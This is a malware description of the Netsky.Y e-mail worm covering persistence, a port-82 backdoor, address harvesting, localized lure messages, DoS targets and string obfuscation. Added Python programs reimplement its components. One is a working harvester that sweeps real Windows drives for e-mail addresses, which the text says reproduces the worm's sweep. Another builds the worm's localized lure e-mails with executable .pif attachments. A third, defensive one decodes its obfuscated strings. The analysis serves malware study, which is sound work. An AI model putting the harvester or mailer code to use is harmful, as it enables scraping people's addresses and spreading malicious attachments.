Win32.Netsky.Y@mm
First posted on 21 November 2011.
Source: BitDefender
Aliases: Win32.Netsky.Y@mm is also known as I-Worm.NetSky.y (KAV).
Explanation:
The worm spreads via e-mail; a machine is infected when the user runs the attachment.
It was written in C++, compiled with Visual C++ 6 and packed.
When run, it first copies itself to %windir%\FirewallSvr.exe and creates a registry entry pointing to that file so that it is loaded at system startup.
It then checks for a mutex named ____--->>>>U<<<<--____ so that only one copy of the worm runs at a time.
After that it initializes the internal variables used for address harvesting and mass-mailing, setting the first e-mail address to hukanmikloiuo@yahoo.com. At this time it also creates a file called f**k_you_bagle.txt containing a base64-encoded copy of the worm. This file is used later when sending e-mail: its contents are appended to the message text as the attachment data.
Next it creates a thread that searches drives C: through Z:, skipping CD/DVD-ROM drives, for files of specific types that may contain e-mail addresses; it stops after collecting 312661 (0x4C555) addresses.
The files scanned for email addresses must have one of the following extensions:
.eml
.txt
.php
.cfg
.mbx
.mdx
.asp
.wab
.doc
.vbs
.rtf
.uin
.shtm
.cgi
.dhtm
.adb
.tbb
.dbx
.pl
.htm
.html
.sht
.oft
.msg
.ods
.stm
.xls
.jsp
.wsh
.xml
.mht
.mmf
.nch
.ppt
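The harvesting thread described above, modelled in Python as an added example (this is not BitDefender's or the worm's code). It walks a set of roots, opens only files whose extension is in the list above, pulls addresses out with a regular expression, de-duplicates them and stops at the 0x4C555 cap. The address pattern, case-insensitive extension matching and the sample files are assumptions; on Windows, `local_drive_roots()` enumerates C: through Z: and skips CD/DVD drives with GetDriveTypeW(), mirroring the write-up.

```python
"""Added example: a simplified model of the address-harvesting thread."""
from __future__ import annotations

import os
import re
import sys
import tempfile
from typing import Iterable

# Extension list as given in the write-up (compared case-insensitively here; an assumption).
HARVEST_EXTENSIONS = {
    ".eml", ".txt", ".php", ".cfg", ".mbx", ".mdx", ".asp", ".wab", ".doc",
    ".vbs", ".rtf", ".uin", ".shtm", ".cgi", ".dhtm", ".adb", ".tbb", ".dbx",
    ".pl", ".htm", ".html", ".sht", ".oft", ".msg", ".ods", ".stm", ".xls",
    ".jsp", ".wsh", ".xml", ".mht", ".mmf", ".nch", ".ppt",
}
MAX_ADDRESSES = 0x4C555  # 312661, the cap named in the write-up

# The worm's exact address matcher is not documented; this loose pattern is an assumption.
EMAIL_RE = re.compile(rb"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

DRIVE_CDROM = 5  # GetDriveTypeW() result for CD/DVD drives


def local_drive_roots() -> list[str]:
    """C: through Z: on Windows, skipping CD/DVD drives; an empty list elsewhere."""
    if sys.platform != "win32":
        return []
    import ctypes
    roots = []
    for letter in map(chr, range(ord("C"), ord("Z") + 1)):
        root = f"{letter}:\\"
        if os.path.exists(root) and ctypes.windll.kernel32.GetDriveTypeW(root) != DRIVE_CDROM:
            roots.append(root)
    return roots


def harvest_addresses(roots: Iterable[str], limit: int = MAX_ADDRESSES) -> list[str]:
    """Walk each root, read files with a harvestable extension and return unique
    addresses in discovery order, stopping once `limit` addresses are collected."""
    found: list[str] = []
    seen: set[str] = set()
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                if os.path.splitext(name)[1].lower() not in HARVEST_EXTENSIONS:
                    continue
                try:
                    with open(os.path.join(dirpath, name), "rb") as fh:
                        data = fh.read()
                except OSError:  # unreadable file: skip it, as a harvester would
                    continue
                for match in EMAIL_RE.finditer(data):
                    addr = match.group(0).decode("ascii", "ignore").lower()
                    if addr in seen:
                        continue
                    seen.add(addr)
                    found.append(addr)
                    if len(found) >= limit:
                        return found
    return found


def build_sample_tree(base: str) -> None:
    """Constructed sample data for the demo: one harvestable .txt and one .exe that is skipped."""
    mail_dir = os.path.join(base, "mail")
    os.makedirs(mail_dir, exist_ok=True)
    with open(os.path.join(mail_dir, "inbox.txt"), "wb") as fh:
        fh.write(b"From: alice@example.de\nTo: Bob <bob@example.com>\nCc: alice@example.de\n")
    with open(os.path.join(mail_dir, "tool.exe"), "wb") as fh:
        fh.write(b"MZ... support@example.org ...")  # wrong extension: never opened


def demo(limit: int = MAX_ADDRESSES) -> list[str]:
    """Run the harvester over the constructed tree in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return harvest_addresses([tmp], limit)


if __name__ == "__main__":
    print(demo())         # ['alice@example.de', 'bob@example.com']
    print(demo(limit=1))  # ['alice@example.de']
```

Running `harvest_addresses(local_drive_roots())` on a Windows host reproduces the worm's sweep; the demo keeps everything inside a temporary directory so it can be run safely anywhere.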
The worm then creates a thread that acts as a backdoor, opening and listening on port 82. When an attacker sends a file to this port, the worm saves it as Rand.exe and executes it, where Rand is a random number in the range 0-32767.
Finally the worm creates 7 threads that send e-mail to the harvested addresses.
Before sending, each address is validated by a Mail eXchange (MX) look-up against several hard-coded servers.
The subject, body and attachment name are chosen from the country code (top-level domain) of the destination address as follows; the bodies are machine-translated variants of the English fallback listed at the end:
The order is: country code, attachment base name, subject, body message.
.de, dokument, Re: dokument, Bitte lesen Sie das Dokument.
.fr, document, Re: document, Veuillez lire le document.
.it, documento, Re: documento, Legga prego il documento.
.pt, original, Re: original, Leia por favor o original.
.no, dokumentet, Re: dokumentet, Behage lese dokumentet.
.pl, udokumentowac, Re: udokumentowac, Podobac sie przeczytac ten udokumentowac.
.fi, dokumentoida, Re: dokumentoida, Haluta kuulua dokumentoida.
.se, dokumenten, Re: dokumenten, Behaga läsa dokumenten.
.tk, belge, Re: belge, mutlu etmek okumak belgili tanimlik belge.
If none of the codes above matches, the following is used:
.xx, document, Re: document, Please read the document.
The author probably intended to build the attachment name from the attachment base name plus the executable .pif extension, but instead the name is built from the country code plus .pif (roughly de.pif instead of dokument.pif).
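Template selection and message construction for one recipient, as an added example (not BitDefender's or the worm's code). It encodes the table above, picks the template by the recipient's top-level domain, and builds the attachment name either the way the write-up says the worm does (country code plus .pif) or the way the author presumably intended (base name plus .pif), so the bug is visible side by side. Stripping the leading dot from the country code, the sender address and the payload bytes are assumptions; the real worm pastes a pre-computed base64 copy of itself, which `EmailMessage.add_attachment()` produces here on the fly.

```python
"""Added example: per-country template selection and the .pif attachment-name bug."""
from __future__ import annotations

from email.message import EmailMessage

# Per-country-code templates from the write-up: (attachment base name, subject, body)
TEMPLATES = {
    ".de": ("dokument", "Re: dokument", "Bitte lesen Sie das Dokument."),
    ".fr": ("document", "Re: document", "Veuillez lire le document."),
    ".it": ("documento", "Re: documento", "Legga prego il documento."),
    ".pt": ("original", "Re: original", "Leia por favor o original."),
    ".no": ("dokumentet", "Re: dokumentet", "Behage lese dokumentet."),
    ".pl": ("udokumentowac", "Re: udokumentowac", "Podobac sie przeczytac ten udokumentowac."),
    ".fi": ("dokumentoida", "Re: dokumentoida", "Haluta kuulua dokumentoida."),
    ".se": ("dokumenten", "Re: dokumenten", "Behaga läsa dokumenten."),
    ".tk": ("belge", "Re: belge", "mutlu etmek okumak belgili tanimlik belge."),
}
FALLBACK = (".xx", ("document", "Re: document", "Please read the document."))

# Constructed stand-in for the worm body; not real malware.
SAMPLE_PAYLOAD = b"MZ\x90\x00" + b"\x00" * 28


def pick_template(recipient: str):
    """Return (country code, template) for the recipient's domain, or the .xx fallback."""
    domain = recipient.rpartition("@")[2].lower()
    for code, template in TEMPLATES.items():
        if domain.endswith(code):
            return code, template
    return FALLBACK


def attachment_name(recipient: str, reproduce_bug: bool = True) -> str:
    """reproduce_bug=True: country code + .pif, as the write-up says the worm does.
    reproduce_bug=False: base name + .pif, as the author presumably intended.
    Dropping the code's leading dot is an assumption; the write-up does not show the exact name."""
    code, (base, _subject, _body) = pick_template(recipient)
    stem = code.lstrip(".") if reproduce_bug else base
    return stem + ".pif"


def build_message(sender: str, recipient: str, payload: bytes,
                  reproduce_bug: bool = True) -> EmailMessage:
    """Compose the e-mail: localized subject and body plus the payload as a base64 attachment."""
    _code, (_base, subject, body) = pick_template(recipient)
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    msg.set_content(body)
    # add_attachment() base64-encodes binary data (Content-Transfer-Encoding: base64),
    # the same form the worm keeps ready in its text file.
    msg.add_attachment(payload, maintype="application", subtype="octet-stream",
                       filename=attachment_name(recipient, reproduce_bug))
    return msg


def demo(recipient: str, reproduce_bug: bool = True) -> tuple[str, str, str, bool]:
    """Build a message and report (subject, attachment name, transfer encoding, payload round-trips)."""
    msg = build_message("sender@example.net", recipient, SAMPLE_PAYLOAD, reproduce_bug)
    part = next(msg.iter_attachments())
    return (str(msg["Subject"]), part.get_filename(),
            str(part["Content-Transfer-Encoding"]),
            part.get_payload(decode=True) == SAMPLE_PAYLOAD)


if __name__ == "__main__":
    print(demo("user@example.de"))                       # ('Re: dokument', 'de.pif', 'base64', True)
    print(demo("user@example.de", reproduce_bug=False))  # ('Re: dokument', 'dokument.pif', 'base64', True)
    print(demo("user@example.com"))                      # ('Re: document', 'xx.pif', 'base64', True)
```

The MX validation mentioned above is deliberately left out so the example runs offline; in practice it is a DNS query on the recipient's domain made before `build_message()` is called.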
From April 28 to 30, 2004, the worm creates a total of 50 (49+1) threads that attempt DoS attacks on the following sites:
www.nibis.de
www.medinfo.ufl.edu
www.educa.ch
Most of the strings used by the worm are obfuscated with a translation table over the characters A-Z and a-z, i.e. a simple letter-for-letter substitution.
Last update 21 November 2011
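How an analyst reads strings protected by such a translation table, as an added example (not BitDefender's or the worm's code): since the table only swaps letters and leaves punctuation alone, each known plaintext (a file name such as FirewallSvr.exe that is already known from the write-up) fixes part of the cipher-to-plain mapping, and the table is recovered by merging several known pairs while rejecting contradictions. The worm's real table is not given in the write-up, so `DEMO_TABLE` is a stand-in rotation used only to produce sample ciphertext.

```python
"""Added example: known-plaintext recovery of a letter-substitution table."""
from __future__ import annotations

import string

LETTERS = string.ascii_uppercase + string.ascii_lowercase

# Stand-in table for the demo (the real one is not in the write-up): each case block
# is rotated by a fixed amount, which is a letter-for-letter substitution like the
# one described and nothing more.
_UPPER_ROT, _LOWER_ROT = 5, 11
DEMO_TABLE = str.maketrans(
    LETTERS,
    string.ascii_uppercase[_UPPER_ROT:] + string.ascii_uppercase[:_UPPER_ROT]
    + string.ascii_lowercase[_LOWER_ROT:] + string.ascii_lowercase[:_LOWER_ROT],
)


def obfuscate(text: str) -> str:
    """Build-time side: map letters through the table, leave everything else alone."""
    return text.translate(DEMO_TABLE)


def recover_table(pairs) -> dict[str, str]:
    """Merge (ciphertext, known plaintext) pairs into a cipher-letter -> plain-letter map.
    A contradiction means one of the guesses is wrong, so it raises instead of being kept."""
    table: dict[str, str] = {}
    for cipher, plain in pairs:
        if len(cipher) != len(plain):
            raise ValueError("a substitution keeps length; these lengths differ")
        for c, p in zip(cipher, plain):
            if c not in LETTERS:
                if c != p:
                    raise ValueError(f"non-letter {c!r} should pass through unchanged")
                continue
            if table.setdefault(c, p) != p:
                raise ValueError(f"conflicting mapping for {c!r}: {table[c]!r} vs {p!r}")
    return table


def deobfuscate(cipher: str, table: dict[str, str]) -> str:
    """Decode with a possibly partial table; letters not yet recovered show as '?'."""
    return "".join(table.get(c, "?") if c in LETTERS else c for c in cipher)


def demo() -> tuple[str, str]:
    """Recover from one known string, decode a second one partially, then add it and decode fully."""
    known = "FirewallSvr.exe"          # file name from the write-up
    target = obfuscate("Rand.exe")      # a second string we want to read
    table = recover_table([(obfuscate(known), known)])
    partial = deobfuscate(target, table)  # R, n, d were never seen, so they stay '?'
    table = recover_table([(obfuscate(known), known), (target, "Rand.exe")])
    return partial, deobfuscate(target, table)


if __name__ == "__main__":
    print(demo())  # ('?a??.exe', 'Rand.exe')
```

Each additional known string (mutex name, file names, hard-coded addresses) fills in more of the 52 entries; once the table is complete, every string in the binary decodes at once.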